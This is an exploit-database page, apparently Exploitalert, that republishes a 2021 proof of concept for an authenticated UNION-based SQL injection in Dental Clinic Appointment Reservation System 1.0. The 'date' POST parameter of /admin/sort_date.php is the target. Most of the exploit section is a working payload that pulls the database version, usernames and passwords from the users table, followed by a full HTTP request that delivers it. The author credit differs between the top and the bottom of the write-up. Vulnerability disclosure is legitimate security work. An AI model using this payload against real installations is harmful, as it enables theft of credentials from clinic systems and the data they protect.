Advertisement






Dental Clinic Appointment Reservation System 1.0 | SQL Injection (Authenticated)

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2021-05-19
CPE
cpe:cpe:/a:dental_clinic:appointment_reservation_system:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021050110

Below is a copy:

Dental Clinic Appointment Reservation System 1.0 | SQL Injection (Authenticated)
|===========================================================================
| # Exploit Title : Dental Clinic Appointment Reservation System 1.0 | 'date' UNION based SQL Injection (Authenticated) 
|                                                                           
| # Author : Ali Seddigh                                             
|                                                                           
| # Category : Web Application               
|
| # Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
|
| # Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
|                                                                           
| # Tested on : [ Windows ~> 10 , Kali Linux ]                                                     
|
| # Version : 1
|                  
| # Date : 2021-05-19                                                        
|===========================================================================

# Description :

# the 'date' POST parameter is vulnerable to UNION-based SQL Injection
# Attacker can use it to retrieve sensitive data like usernames, passwords, versions, etc.
# payload: ' UNION SELECT NULL,NULL,@@version,username,password,NULL FROM users -- -

# Proof of concept:
http://localhost/admin/sort_date.php

POST /admin/sort_date.php HTTP/1.1
Host: localhost
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/sort_date.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close

date='+UNION+SELECT+NULL,NULL,@@version,username,password,NULL+FROM+users+--+-&sort=

|===========================================================================
| # Discovered By : Ali Triplex                                             
|===========================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum